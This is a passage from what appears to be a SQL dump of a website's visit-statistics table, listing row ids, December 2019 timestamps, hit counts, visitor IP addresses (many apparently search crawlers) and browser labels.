4,1576482242,1,1,0,0,'66.249.64.28','chrome'),(469155,1576482266,3,3,0,0,'66.249.64.27','chrome'),(469156,1576482330,1,1,0,0,'66.249.64.26','chrome'),(469157,1576482649,6,6,0,0,'3.81.29.254','other'),(469158,1576482722,2,2,0,0,'207.46.13.197','other'),(469159,1576482864,1,1,0,0,'66.249.70.36','chrome'),(469160,1576483040,1,1,0,0,'207.46.13.124','other'),(469161,1576483069,1,1,0,0,'46.201.148.104','opera'),(469162,1576483376,1,1,0,0,'5.196.92.91','firefox'),(469163,1576483819,13,13,0,0,'3.81.29.254','other'),(469164,1576484601,1,1,0,0,'207.46.13.197','other'),(469165,1576484678,1,1,0,0,'157.55.39.69','other'),(469166,1576484727,1,1,0,0,'66.249.64.27','chrome'),(469167,1576484911,1,1,0,0,'91.196.178.174','chrome'),(469168,1576484923,6,6,0,0,'3.81.29.254','other'),(469169,1576484958,1,1,0,0,'193.105.7.58','firefox'),(469170,1576485447,1,1,0,0,'157.55.39.226','other'),(469171,1576485725,1,1,0,0,'141.8.132.2','other'),(469172,1576485875,1,1,0,0,'66.249.64.27','chrome'),(469173,1576486114,1,1,0,0,'3.81.29.254','other'),(469174,1576486446,1,1,0,0,'178.92.249.234','chrome'),(469175,1576487314,1,1,0,0,'91.233.90.6','chrome'),(469176,1576487370,1,1,0,0,'46.185.36.185','chrome'),(469177,1576487604,1,1,0,0,'141.8.132.12','other'),(469178,1576488206,1,1,0,0,'66.249.64.27','chrome'),(469179,1576488905,2,2,0,0,'213.180.203.44','other'),(469180,1576489396,1,1,0,0,'157.55.39.226','other'),(469181,1576489500,1,1,0,0,'62.175.32.180','chrome'),(469182,1576489546,3,3,0,0,'66.249.64.28','chrome'),(469183,1576489921,1,1,0,0,'31.13.127.21','other'),(469184,1576489922,1,1,0,0,'31.13.127.7','other'),(469185,1576490029,1,1,0,0,'91.196.178.8','chrome'),(469186,1576490710,1,1,0,0,'91.196.177.46','chrome'),(469187,1576490817,1,1,0,0,'157.55.39.190','other'),(469188,1576490933,1,1,0,0,'31.13.127.14','other'),(469189,1576490934,1,1,0,0,'31.13.127.1','other'),(469190,1576491130,1,1,0,0,'13.58.239.65','chrome'),(469191,1576491365,1,1,0,0,'66.249.64.26','chrome'),(469192,1576491497,1,1,0,0,'66.249.64.28','chrome'),(469193,1576491907,1,1,0,0,'8.29.198.27','other'),(469194,1576492526,1,1,0,0,'18.197.53.120','firefox'),(469195,1576492540,1,1,0,0,'66.249.64.27','chrome'),(469196,1576492659,1,1,0,0,'8.29.198.25','other'),(469197,1576493167,1,1,0,0,'66.249.64.26','chrome'),(469198,1576493168,1,1,0,0,'66.249.70.62','chrome'),(469199,1576493369,1,1,0,0,'91.196.178.102','chrome'),(469200,1576495600,1,1,0,0,'109.74.154.72','chrome'),(469201,1576497767,1,1,0,0,'157.55.39.226','other'),(469202,1576497949,1,1,0,0,'157.55.39.190','other'),(469203,1576498331,2,2,0,0,'66.249.64.26','chrome'),(469204,1576498452,1,1,0,0,'66.249.64.27','chrome'),(469205,1576498840,1,1,0,0,'82.207.49.98','chrome'),(469206,1576499040,1,1,0,0,'91.196.178.185','chrome'),(469207,1576499211,1,1,0,0,'66.249.70.33','chrome'),(469208,1576499224,1,1,0,0,'66.249.64.28','chrome'),(469209,1576499773,1,1,0,0,'157.55.39.190','other'),(469210,1576499837,1,1,0,0,'37.9.113.10','other'),(469211,1576500151,1,1,0,0,'66.249.64.26','chrome'),(469212,1576500884,1,1,0,0,'37.9.113.177','other'),(469213,1576501340,1,1,0,0,'91.196.178.170','chrome'),(469214,1576502038,1,1,0,0,'213.180.203.44','other'),(469215,1576502119,1,1,0,0,'66.249.64.28','chrome'),(469216,1576502704,1,1,0,0,'37.73.224.145','chrome'),(469217,1576502804,1,1,0,0,'8.29.198.25','other'),(469218,1576503176,1,1,0,0,'213.180.203.44','other'),(469219,1576503529,1,1,0,0,'8.29.198.26','other'),(469220,1576503821,1,1,0,0,'91.196.178.179','chrome'),(469221,1576504013,1,1,0,0,'91.196.178.77','chrome'),(469222,1576504599,1,1,0,0,'213.180.203.44','other'),(469223,1576504604,2,2,0,0,'66.249.70.33','chrome'),(469224,1576505024,1,1,0,0,'91.196.178.179','chrome'),(469225,1576505218,1,1,0,0,'66.249.64.26','chrome'),(469226,1576505351,27,27,0,0,'192.99.37.138','other'),(469227,1576505813,1,1,0,0,'91.196.178.135','firefox'),(469228,1576505936,1,1,0,0,'91.196.178.179','chrome'),(469229,1576506914,1,1,0,0,'195.10.210.70','chrome'),(469230,1576507008,1,1,0,0,'66.249.70.36','chrome'),(469231,1576507263,1,1,0,0,'77.111.244.96','chrome'),(469232,1576507534,1,1,0,0,'66.249.64.27','chrome'),(469233,1576508325,1,1,0,0,'157.55.39.226','other'),(469234,1576508987,1,1,0,0,'46.211.218.17','chrome'),(469235,1576509001,1,1,0,0,'92.113.126.212','firefox'),(469236,1576509109,1,1,0,0,'92.113.126.212','chrome'),(469237,1576509137,1,1,0,0,'95.132.46.217','chrome'),(469238,1576509194,1,1,0,0,'95.108.213.55','other'),(469239,1576509264,1,1,0,0,'141.8.132.12','other'),(469240,1576509331,1,1,0,0,'157.55.39.190','other'),(469241,1576509967,1,1,0,0,'93.73.160.193','firefox'),(469242,1576509978,1,1,0,0,'91.196.178.179','chrome'),(469243,1576510670,1,1,0,0,'13.66.139.0','other'),(469244,1576511284,1,1,0,0,'66.249.64.28','chrome'),(469245,1576512688,1,1,0,0,'91.196.178.91','firefox'),(469246,1576513709,1,1,0,0,'8.29.198.25','other'),(469247,1576513770,1,1,0,0,'207.46.13.157','other'),(469248,1576513876,1,1,0,0,'188.163.32.33','chrome'),(469249,1576514419,1,1,0,0,'8.29.198.27','other'),(469250,1576514613,1,1,0,0,'157.55.39.190','other'),(469251,1576515004,1,1,0,0,'213.180.203.37','other'),(469252,1576515024,1,1,0,0,'95.108.213.55','chrome'),(469253,1576515060,1,1,0,0,'207.46.13.157','other'),(469254,1576515206,2,2,0,0,'66.249.64.28','chrome'),(469255,1576516739,2,2,0,0,'91.196.178.177','chrome'),(469256,1576517264,1,1,0,0,'91.196.178.169','chrome'),(469257,1576517280,1,1,0,0,'157.55.39.226','other'),(469258,1576519045,1,1,0,0,'213.180.203.44','other'),(469259,1576519066,1,1,0,0,'66.249.64.28','chrome'),(469260,1576519257,1,1,0,0,'91.196.178.84','firefox'),(469261,1576519358,1,1,0,0,'91.196.178.84','chrome'),(469262,1576519502,1,1,0,0,'35.158.161.91','other'),(469263,1576520060,1,1,0,0,'141.8.142.2','other'),(469264,1576520090,1,1,0,0,'207.46.13.157','other'),(469265,1576520103,1,1,0,0,'157.55.39.190','other'),(469266,1576522146,1,1,0,0,'95.108.181.104','other'),(469267,1576522270,1,1,0,0,'91.196.178.163','chrome'),(469268,1576523229,1,1,0,0,'213.180.203.44','other'),(469269,1576523277,1,1,0,0,'66.249.64.26','chrome'),(469270,1576523965,1,1,0,0,'157.55.39.190','other'),(469271,1576524120,1,1,0,0,'157.55.39.226','other'),(469272,1576524188,1,1,0,0,'94.180.151.189','chrome'),(469273,1576524595,1,1,0,0,'8.29.198.26','other'),(469274,1576525121,1,1,0,0,'18.197.19.180','other'),(469275,1576525146,1,1,0,0,'207.46.13.157','other'),(469276,1576525312,1,1,0,0,'8.29.198.25','other'),(469277,1576526712,1,1,0,0,'66.249.64.27','chrome'),(469278,1576527052,1,0,1,0,'66.249.70.36',''),(469279,1576527413,1,1,0,0,'213.180.203.44','other'),(469280,1576527690,2,2,0,0,'95.213.141.126','opera'),(469281,1576529054,1,1,0,0,'5.45.207.49','other'),(469282,1576530403,1,1,0,0,'213.180.203.44','other'),(469283,1576531104,3,3,0,0,'31.13.127.21','other'),(469284,1576531106,1,1,0,0,'31.13.127.15','other'),(469285,1576531891,1,1,0,0,'157.55.39.226','other'),(469286,1576535482,1,1,0,0,'8.29.198.25','other'),(469287,1576535856,1,1,0,0,'213.180.203.37','other'),(469288,1576535860,1,1,0,0,'213.180.203.44','other'),(469289,1576536202,1,1,0,0,'8.29.198.26','other'),(469290,1576536572,1,1,0,0,'157.55.39.190','other'),(469291,1576537205,85,85,0,0,'194.209.25.139','other'),(469292,1576539108,3,3,0,0,'157.55.39.226','other'),(469293,1576539961,1,1,0,0,'213.180.203.44','other'),(469294,1576540867,1,1,0,0,'213.180.203.44','other'),(469295,1576541219,1,1,0,0,'66.249.64.27','chrome'),(469296,1576541532,33,33,0,0,'144.76.96.236','other'),(469297,1576541915,1,1,0,0,'87.250.224.90','other'),(469298,1576542099,1,1,0,0,'157.55.39.226','other'),(469299,1576542449,1,1,0,0,'66.249.64.28','chrome'),(469300,1576544115,1,1,0,0,'62.205.134.182','other'),(469301,1576544384,1,1,0,0,'66.249.64.27','chrome'),(469302,1576544605,1,0,1,0,'66.249.64.28',''),(469303,1576545166,1,1,0,0,'178.154.200.33','other'),(469304,1576545223,1,1,0,0,'207.180.221.167','other'),(469305,1576546340,1,1,0,0,'13.66.139.0','other'),(469306,1576546351,1,1,0,0,'8.29.198.26','other'),(469307,1576547081,1,1,0,0,'8.29.198.27','other'),(469308,1576547565,1,1,0,0,'207.46.13.19','other'),(469309,1576548501,1,1,0,0,'213.180.203.37','other'),(469310,1576548533,1,1,0,0,'87.250.224.90','other'),(469311,1576549656,1,1,0,0,'157.55.39.190','other'),(469312,1576549872,1,1,0,0,'66.249.64.28','chrome'),(469313,1576550431,1,1,0,0,'157.55.39.226','other'),(469314,1576550646,1,1,0,0,'213.180.203.37','other'),(469315,1576550652,2,2,0,0,'213.180.203.44','other'),(469316,1576550736,1,1,0,0,'54.186.231.161','chrome'),(469317,1576550739,1,1,0,0,'52.34.24.33','other'),(469318,1576550819,1,1,0,0,'66.249.64.28','chrome'),(469319,1576551614,1,1,0,0,'213.180.203.44','other'),(469320,1576552349,2,2,0,0,'157.55.39.226','other'),(469321,1576553308,1,1,0,0,'66.249.64.27','chrome'),(469322,1576553421,2,2,0,0,'66.249.64.26','chrome'),(469323,1576553588,1,1,0,0,'141.8.188.25','other'),(469324,1576553597,1,1,0,0,'37.9.113.177','other'),(469325,1576553671,4,4,0,0,'207.46.13.19','other'),(469326,1576553813,1,1,0,0,'157.55.39.190','other'),(469327,1576554212,1,1,0,0,'157.55.39.226','other'),(469328,1576555441,1,1,0,0,'213.180.203.44','other'),(469329,1576556355,2,2,0,0,'91.196.178.134','firefox'),(469330,1576556617,1,1,0,0,'207.46.13.19','other'),(469331,1576557146,1,1,0,0,'66.249.64.28','chrome'),(469332,1576557162,2,2,0,0,'66.249.64.26','chrome'),(469333,1576557251,2,2,0,0,'8.29.198.26','other'),(469334,1576557628,1,1,0,0,'141.8.142.2','other'),(469335,1576557703,1,1,0,0,'66.249.70.62','chrome'),(469336,1576558273,1,1,0,0,'207.46.13.19','other'),(469337,1576558337,1,1,0,0,'66.249.70.36','chrome'),(469338,1576558546,1,1,0,0,'213.180.203.44','other'),(469339,1576558923,1,1,0,0,'66.249.64.26','chrome'),(469340,1576559534,1,1,0,0,'66.249.64.28','chrome'),(469341,1576559586,1,1,0,0,'207.46.13.19','other'),(469342,1576559753,1,1,0,0,'213.180.203.44','other'),(469343,1576560570,1,1,0,0,'157.55.39.190','other'),(469344,1576560727,2,2,0,0,'66.249.70.36','chrome'),(469345,1576560920,1,1,0,0,'66.249.64.28','chrome'),(469346,1576560941,1,1,0,0,'66.249.64.27','chrome'),(469347,1576561109,1,1,0,0,'66.249.70.62','chrome'),(469348,1576561418,1,1,0,0,'66.249.64.26','chrome'),(469349,1576561500,1,1,0,0,'62.205.134.182','other'),(469350,1576561777,1,1,0,0,'213.180.203.37','other'),(469351,1576562520,2,2,0,0,'213.180.203.44','other'),(469352,1576563804,1,1,0,0,'213.180.203.37','other'),(469353,1576564673,2,2,0,0,'213.180.203.44','other'),(469354,1576564675,1,1,0,0,'157.55.39.226','other'),(469355,1576565379,1,1,0,0,'157.55.39.190','other'),(469356,1576565606,8,8,0,0,'66.249.64.26','chrome'),(469357,1576565807,2,2,0,0,'66.249.64.27','chrome'),(469358,1576565818,1,1,0,0,'213.180.203.44','other'),(469359,1576565853,1,1,0,0,'46.211.45.128','chrome'),(469360,1576565978,1,1,0,0,'207.46.13.159','other'),(469361,1576566752,1,1,0,0,'213.180.203.44','other'),(469362,1576567190,1,1,0,0,'91.196.178.77','chrome'),(469363,1576567927,1,1,0,0,'66.249.70.33','chrome'),(469364,1576568134,2,2,0,0,'8.29.198.27','other'),(469365,1576568350,2,2,0,0,'66.249.64.28','chrome'),(469366,1576568583,1,1,0,0,'66.249.64.26','chrome'),(469367,1576568654,1,1,0,0,'207.46.13.19','other'),(469368,1576568684,1,1,0,0,'213.180.203.37','other'),(469369,1576568945,1,1,0,0,'66.249.64.27','chrome'),(469370,1576569256,1,1,0,0,'91.196.177.46','chrome'),(469371,1576569440,1,1,0,0,'91.196.177.15','chrome'),(469372,1576569503,1,1,0,0,'66.249.64.28','chrome'),(469373,1576569644,1,1,0,0,'66.249.64.26','chrome'),(469374,1576569778,1,1,0,0,'66.249.70.36','chrome'),(469375,1576570362,1,1,0,0,'157.55.39.226','other'),(469376,1576570577,1,1,0,0,'141.8.132.12','other'),(469377,1576570660,1,1,0,0,'37.9.113.163','other'),(469378,1576570702,1,1,0,0,'178.154.200.13','other'),(469379,1576570712,1,1,0,0,'66.249.64.26','chrome'),(469380,1576570716,2,2,0,0,'141.8.142.50','other'),(469381,1576570742,1,1,0,0,'91.196.177.46','chrome'),(469382,1576570870,1,1,0,0,'207.46.13.159','other'),(469383,1576570957,1,1,0,0,'5.45.207.49','other'),(469384,1576571788,1,1,0,0,'130.180.217.109','chrome'),(469385,1576572229,1,1,0,0,'66.249.64.27','chrome'),(469386,1576572373,1,1,0,0,'157.55.39.190','other'),(469387,1576572613,1,1,0,0,'66.249.64.28','chrome'),(469388,1576573444,1,1,0,0,'46.101.47.128','chrome'),(469389,1576573548,1,1,0,0,'95.134.34.81','chrome'),(469390,1576573579,1,1,0,0,'95.108.181.104','other'),(469391,1576573714,1,1,0,0,'207.46.13.159','other'),(469392,1576574019,1,1,0,0,'151.80.36.200','firefox'),(469393,1576574034,1,1,0,0,'207.46.13.230','other'),(469394,1576574086,1,1,0,0,'178.251.111.186','chrome'),(469395,1576574490,2,2,0,0,'141.8.132.2','other'),(469396,1576574630,2,2,0,0,'157.55.39.226','other'),(469397,1576574683,1,1,0,0,'35.172.234.226','chrome'),(469398,1576575032,3,3,0,0,'195.88.242.209','firefox'),(469399,1576575034,1,1,0,0,'195.88.242.209','chrome'),(469400,1576575485,1,1,0,0,'66.249.64.28','chrome'),(469401,1576575668,1,1,0,0,'213.180.203.44','other'),(469402,1576576335,1,1,0,0,'157.55.39.226','other'),(469403,1576576497,1,1,0,0,'91.218.46.84','chrome'),(469404,1576576607,1,1,0,0,'5.182.96.222','chrome'),(469405,1576577674,1,1,0,0,'213.180.203.44','other'),(469406,1576577851,1,1,0,0,'157.55.39.226','other'),(469407,1576577950,1,1,0,0,'94.153.97.65','other'),(469408,1576578102,1,1,0,0,'66.249.64.26','chrome'),(469409,1576579035,3,3,0,0,'66.249.64.27','chrome'),(469410,1576579036,1,1,0,0,'8.29.198.25','other'),(469411,1576579154,3,3,0,0,'207.46.13.159','other'),(469412,1576579277,2,2,0,0,'66.249.64.28','chrome'),(469413,1576579308,1,1,0,0,'66.249.64.26','chrome'),(469414,1576579725,1,1,0,0,'8.29.198.27','other'),(469415,1576580002,1,1,0,0,'91.196.178.71','other'),(469416,1576580411,2,2,0,0,'91.201.180.90','firefox'),(469417,1576580636,1,1,0,0,'209.17.96.114','other'),(469418,1576580711,3,3,0,0,'213.180.203.44','other'),(469419,1576580733,1,1,0,0,'141.8.142.2','other'),(469420,1576580861,1,1,0,0,'157.55.39.226','other'),(469421,1576581146,1,1,0,0,'109.74.154.72','chrome'),(469422,1576581471,3,3,0,0,'157.55.39.190','other'),(469423,1576581574,1,0,1,0,'66.249.64.28',''),(469424,1576581868,1,1,0,0,'207.46.13.159','other'),(469425,1576582258,1,1,0,0,'157.55.39.226','other'),(469426,1576582413,1,1,0,0,'157.55.39.190','other'),(469427,1576582635,1,1,0,0,'66.249.70.33','chrome'),(469428,1576582948,1,1,0,0,'66.249.64.28','chrome'),(469429,1576583059,3,3,0,0,'66.249.64.26','chrome'),(469430,1576583909,1,1,0,0,'66.249.64.28','chrome'),(469431,1576584304,1,1,0,0,'207.46.13.159','other'),(469432,1576584333,1,1,0,0,'66.249.70.33','chrome'),(469433,1576584487,1,1,0,0,'195.128.226.204','chrome'),(469434,1576584620,1,1,0,0,'141.8.142.161','other'),(469435,1576584722,1,1,0,0,'46.201.134.241','chrome'),(469436,1576585421,1,1,0,0,'157.55.39.190','other'),(469437,1576586601,1,1,0,0,'213.180.203.44','other'),(469438,1576587389,1,1,0,0,'91.196.178.181','chrome'),(469439,1576587396,1,1,0,0,'91.196.178.69','chrome'),(469440,1576587600,1,1,0,0,'66.249.64.27','chrome'),(469441,1576587622,1,1,0,0,'207.46.13.159','other'),(469442,1576588854,1,1,0,0,'91.196.178.175','chrome'),(469443,1576588875,1,1,0,0,'91.196.178.179','chrome'),(469444,1576589103,1,1,0,0,'91.196.177.46','chrome'),(469445,1576589228,1,1,0,0,'207.46.13.159','other'),(469446,1576589512,1,1,0,0,'66.249.64.28','chrome'),(469447,1576589951,2,2,0,0,'8.29.198.27','other'),(469448,1576590502,1,1,0,0,'66.249.64.27','chrome'),(469449,1576591131,1,1,0,0,'157.55.39.226','other'),(469450,1576591656,1,1,0,0,'91.196.178.74','firefox'),(469451,1576591668,1,1,0,0,'213.180.203.44','other'),(469452,1576591670,1,1,0,0,'207.46.13.159','other'),(469453,1576592774,1,1,0,0,'194.44.220.197','chrome'),(469454,1576593761,1,1,0,0,'207.46.13.159','other'),(469455,1576593844,1,1,0,0,'157.55.39.226','other'),(469456,1576594739,1,1,0,0,'91.196.178.72','chrome'),(469457,1576594762,1,1,0,0,'91.196.178.129','chrome'),(469458,1576595232,1,1,0,0,'91.196.178.179','chrome'),(469459,1576596414,1,1,0,0,'157.55.39.226','other'),(469460,1576597419,1,1,0,0,'66.249.70.33','chrome'),(469461,1576597460,1,1,0,0,'66.249.64.27','chrome'),(469462,1576597534,1,1,0,0,'77.123.1.185','firefox'),(469463,1576597955,1,1,0,0,'66.249.64.26','chrome'),(469464,1576598334,1,1,0,0,'157.55.39.190','other'),(469465,1576598521,1,1,0,0,'77.123.1.185','firefox'),(469466,1576598642,1,1,0,0,'91.196.178.97','chrome'),(469467,1576598885,1,1,0,0,'157.55.39.226','other'),(469468,1576599430,2,0,2,0,'157.55.39.190',''),(469469,1576599674,1,1,0,0,'77.123.1.185','firefox'),(469470,1576600210,1,1,0,0,'66.249.64.28','chrome'),(469471,1576600325,1,1,0,0,'157.55.39.226','other'),(469472,1576600879,1,1,0,0,'8.29.198.26','other'),(469473,1576601546,1,1,0,0,'8.29.198.27','other'),(469474,1576602002,1,1,0,0,'157.55.39.190','other'),(469475,1576602263,1,1,0,0,'207.46.13.159','other'),(469476,1576602361,1,1,0,0,'209.17.97.106','other'),(469477,1576602696,1,1,0,0,'157.55.39.226','other'),(469478,1576603991,2,2,0,0,'157.55.39.190','other'),(469479,1576604887,1,1,0,0,'207.46.13.159','other'),(469480,1576604976,1,1,0,0,'38.99.62.94','other'),(469481,1576606178,1,1,0,0,'207.46.13.159','other'),(469482,1576606573,1,1,0,0,'91.196.178.131','chrome'),(469483,1576607039,1,1,0,0,'178.133.193.157','chrome'),(469484,1576607079,1,0,1,0,'66.249.64.27',''),(469485,1576607822,1,1,0,0,'91.196.178.180','chrome'),(469486,1576608841,1,1,0,0,'178.137.165.188','chrome'),(469487,1576609109,1,1,0,0,'157.55.39.226','other'),(469488,1576609203,2,2,0,0,'207.46.13.159','other'),(469489,1576609372,2,2,0,0,'157.55.39.190','other'),(469490,1576609522,1,1,0,0,'66.249.64.28','chrome'),(469491,1576610144,1,1,0,0,'157.55.39.226','other'),(469492,1576610930,1,0,1,0,'66.249.70.62',''),(469493,1576610953,1,1,0,0,'207.46.13.159','other'),(469494,1576611781,1,1,0,0,'8.29.198.25','other'),(469495,1576611786,1,1,0,0,'157.55.39.190','other'),(469496,1576612094,1,1,0,0,'207.46.13.159','other'),(469497,1576612445,1,1,0,0,'8.29.198.26','other'),(469498,1576612649,1,1,0,0,'91.196.178.57','chrome'),(469499,1576613092,1,1,0,0,'77.123.1.185','firefox'),(469500,1576613484,2,2,0,0,'207.46.13.159','other'),(469501,1576613885,1,1,0,0,'157.55.39.226','other'),(469502,1576614184,2,2,0,0,'157.55.39.190','other'),(469503,1576615121,1,1,0,0,'95.108.213.55','other'),(469504,1576615138,1,1,0,0,'207.46.13.159','other'),(469505,1576616471,1,1,0,0,'66.249.64.28','chrome'),(469506,1576618150,1,1,0,0,'66.249.64.26','chrome'),(469507,1576620080,1,1,0,0,'94.103.95.53','chrome'),(469508,1576620182,2,2,0,0,'66.249.64.26','chrome'),(469509,1576620870,1,1,0,0,'66.249.64.27','chrome'),(469510,1576621052,1,1,0,0,'66.249.70.62','chrome'),(469511,1576621643,1,1,0,0,'193.110.76.2','chrome'),(469512,1576621759,1,1,0,0,'66.249.64.26','chrome'),(469513,1576622260,1,1,0,0,'157.55.39.253','other'),(469514,1576622669,2,2,0,0,'8.29.198.27','other'),(469515,1576622801,2,2,0,0,'66.249.64.27','chrome'),(469516,1576623145,1,1,0,0,'66.249.64.28','chrome'),(469517,1576623428,1,1,0,0,'66.249.70.33','chrome'),(469518,1576623864,1,1,0,0,'213.180.203.44','other'),(469519,1576624053,1,1,0,0,'157.55.39.253','other'),(469520,1576625315,1,1,0,0,'178.93.16.187','other'),(469521,1576625501,1,1,0,0,'66.249.70.62','chrome'),(469522,1576625825,1,1,0,0,'66.249.64.27','chrome'),(469523,1576626884,1,1,0,0,'66.249.70.36','chrome'),(469524,1576627615,1,1,0,0,'157.55.39.253','other'),(469525,1576629046,1,1,0,0,'141.8.142.2','chrome'),(469526,1576630513,1,1,0,0,'62.205.134.182','other'),(469527,1576631020,1,1,0,0,'91.124.83.177','chrome'),(469528,1576631990,2,2,0,0,'207.46.13.239','other'),(469529,1576632483,1,1,0,0,'157.55.39.253','other'),(469530,1576632498,1,1,0,0,'66.249.64.27','chrome'),(469531,1576633562,1,1,0,0,'8.29.198.26','other'),(469532,1576634219,1,1,0,0,'8.29.198.25','other'),(469533,1576634622,2,2,0,0,'66.249.64.28','chrome'),(469534,1576634672,1,1,0,0,'66.249.64.27','chrome'),(469535,1576635805,1,1,0,0,'66.249.70.36','chrome'),(469536,1576637508,1,1,0,0,'54.218.45.122','chrome'),(469537,1576637511,1,1,0,0,'35.162.70.167','other'),(469538,1576639941,2,2,0,0,'66.249.64.27','chrome'),(469539,1576640234,1,1,0,0,'66.249.64.28','chrome'),(469540,1576640719,1,1,0,0,'207.46.13.78','other'),(469541,1576641852,2,2,0,0,'66.249.64.26','chrome'),(469542,1576642013,1,1,0,0,'207.46.13.239','other'),(469543,1576643094,1,1,0,0,'207.46.13.78','other'),(469544,1576643767,1,1,0,0,'213.180.203.44','other'),(469545,1576643819,1,1,0,0,'157.55.39.146','other'),(469546,1576644434,1,1,0,0,'8.29.198.25','other'),(469547,1576645088,1,1,0,0,'66.249.64.28','chrome'),(469548,1576645091,1,1,0,0,'8.29.198.27','other'),(469549,1576645138,1,1,0,0,'66.249.64.27','chrome'),(469550,1576645611,1,1,0,0,'66.249.64.26','chrome'),(469551,1576647515,1,1,0,0,'66.249.64.26','chrome'),(469552,1576647775,1,1,0,0,'62.205.134.182','other'),(469553,1576648157,1,0,1,0,'66.249.70.33',''),(469554,1576648445,1,1,0,0,'51.68.152.26','chrome'),(469555,1576649300,1,1,0,0,'130.180.218.252','chrome'),(469556,1576650609,1,1,0,0,'66.249.64.28','chrome'),(469557,1576650619,1,1,0,0,'66.249.64.27','chrome'),(469558,1576651713,1,1,0,0,'82.207.49.98','chrome'),(469559,1576652625,1,1,0,0,'92.112.4.29','chrome'),(469560,1576652652,2,2,0,0,'66.249.64.26','chrome'),(469561,1576653390,1,1,0,0,'92.113.127.81','chrome'),(469562,1576654098,1,1,0,0,'66.249.64.26','chrome'),(469563,1576654290,1,1,0,0,'66.249.70.33','chrome'),(469564,1576654488,1,1,0,0,'157.55.39.155','other'),(469565,1576654765,1,1,0,0,'66.249.64.28','chrome'),(469566,1576655344,1,1,0,0,'8.29.198.27','other'),(469567,1576655759,1,1,0,0,'207.46.13.78','other'),(469568,1576655968,1,1,0,0,'8.29.198.26','other'),(469569,1576656515,1,1,0,0,'66.249.64.28','chrome'),(469570,1576656666,1,1,0,0,'66.249.70.36','chrome'),(469571,1576658002,1,1,0,0,'157.55.39.146','other'),(469572,1576658018,1,1,0,0,'37.54.164.87','firefox'),(469573,1576658039,1,1,0,0,'207.46.13.239','other'),(469574,1576658045,1,1,0,0,'52.162.161.148','other'),(469575,1576658049,1,0,1,0,'13.66.139.0',''),(469576,1576658053,2,2,0,0,'207.46.13.246','other'),(469577,1576658163,1,1,0,0,'66.249.64.27','chrome'),(469578,1576658961,1,1,0,0,'213.180.203.44','other'),(469579,1576659384,1,1,0,0,'37.54.164.87','firefox'),(469580,1576659619,1,1,0,0,'66.249.70.33','chrome'),(469581,1576659660,1,1,0,0,'66.249.64.26','chrome'),(469582,1576660735,1,1,0,0,'94.153.99.144','chrome'),(469583,1576661042,1,1,0,0,'157.55.39.146','other'),(469584,1576661185,1,1,0,0,'91.209.11.236','other'),(469585,1576661308,1,1,0,0,'66.249.64.27','chrome'),(469586,1576661739,1,1,0,0,'37.9.113.33','other'),(469587,1576661766,1,1,0,0,'37.54.164.87','firefox'),(469588,1576661975,1,1,0,0,'66.249.64.26','chrome'),(469589,1576662853,1,1,0,0,'5.45.207.49','other'),(469590,1576663312,1,1,0,0,'46.211.147.233','chrome'),(469591,1576663451,1,1,0,0,'91.196.178.29','chrome'),(469592,1576663680,1,1,0,0,'91.196.178.171','chrome'),(469593,1576663705,1,1,0,0,'66.249.64.26','chrome'),(469594,1576664170,1,1,0,0,'66.249.70.36','chrome'),(469595,1576664278,1,1,0,0,'18.222.1.194','chrome'),(469596,1576664872,1,1,0,0,'37.53.90.175','chrome'),(469597,1576664874,2,2,0,0,'66.249.64.26','chrome'),(469598,1576665206,2,2,0,0,'91.196.177.15','chrome'),(469599,1576665324,1,1,0,0,'141.8.132.37','other'),(469600,1576665768,1,1,0,0,'157.55.39.146','other'),(469601,1576665773,1,1,0,0,'157.55.39.155','other'),(469602,1576666100,1,1,0,0,'207.46.13.78','other'),(469603,1576666245,2,2,0,0,'95.213.141.126','opera'),(469604,1576666250,2,2,0,0,'8.29.198.26','other'),(469605,1576666759,1,1,0,0,'91.196.178.18','chrome'),(469606,1576666870,1,1,0,0,'66.249.64.28','chrome'),(469607,1576667206,1,1,0,0,'91.196.177.241','chrome'),(469608,1576668107,1,1,0,0,'109.74.154.72','chrome'),(469609,1576668248,1,1,0,0,'176.111.33.18','firefox'),(469610,1576668613,1,1,0,0,'157.55.39.146','other'),(469611,1576669462,1,1,0,0,'37.54.19.232','chrome'),(469612,1576669737,1,1,0,0,'104.219.55.126','chrome'),(469613,1576670014,2,0,2,0,'13.66.139.0',''),(469614,1576671686,1,1,0,0,'66.249.64.28','chrome'),(469615,1576672845,2,2,0,0,'207.46.13.78','other'),(469616,1576673036,1,1,0,0,'5.45.207.65','other'),(469617,1576673086,1,1,0,0,'141.8.183.15','other'),(469618,1576674599,1,1,0,0,'157.55.39.155','other'),(469619,1576674694,1,1,0,0,'91.196.178.179','chrome'),(469620,1576674851,1,1,0,0,'2.36.77.28','chrome'),(469621,1576675433,1,1,0,0,'13.66.139.0','other'),(469622,1576675713,1,1,0,0,'141.8.188.12','other'),(469623,1576675725,2,2,0,0,'157.55.39.146','other'),(469624,1576675957,2,2,0,0,'46.200.45.190','chrome'),(469625,1576677161,1,1,0,0,'8.29.198.26','other'),(469626,1576677485,1,1,0,0,'66.249.93.217','chrome'),(469627,1576677611,1,1,0,0,'92.113.94.129','chrome'),(469628,1576677765,1,1,0,0,'8.29.198.25','other'),(469629,1576678976,1,1,0,0,'37.9.113.202','other'),(469630,1576679017,1,1,0,0,'157.55.39.146','other'),(469631,1576679262,1,1,0,0,'91.196.178.79','firefox'),(469632,1576679321,1,1,0,0,'66.249.64.27','chrome'),(469633,1576679350,1,1,0,0,'66.249.64.26','chrome'),(469634,1576679902,1,1,0,0,'141.8.183.111','other'),(469635,1576680282,1,1,0,0,'141.8.188.25','other'),(469636,1576680288,1,1,0,0,'13.66.139.0','other'),(469637,1576681132,1,1,0,0,'66.249.70.33','chrome'),(469638,1576681375,2,2,0,0,'207.46.13.78','other'),(469639,1576681642,1,1,0,0,'157.55.39.155','other'),(469640,1576682225,1,1,0,0,'141.8.142.177','other'),(469641,1576682322,1,1,0,0,'91.196.178.53','chrome'),(469642,1576682565,1,1,0,0,'91.196.178.179','chrome'),(469643,1576682998,1,1,0,0,'91.196.178.75','chrome'),(469644,1576683707,1,1,0,0,'31.13.127.16','other'),(469645,1576683708,1,1,0,0,'31.13.127.17','other'),(469646,1576684948,1,1,0,0,'157.55.39.229','other'),(469647,1576685072,2,2,0,0,'66.249.64.28','chrome'),(469648,1576685435,1,1,0,0,'141.8.132.12','other'),(469649,1576685691,1,1,0,0,'207.46.13.78','other'),(469650,1576686395,1,1,0,0,'141.8.132.28','other'),(469651,1576686885,1,1,0,0,'207.46.13.78','other'),(469652,1576687165,1,1,0,0,'80.249.144.8','other'),(469653,1576687222,1,1,0,0,'37.53.122.65','chrome'),(469654,1576687289,1,1,0,0,'66.249.64.26','chrome'),(469655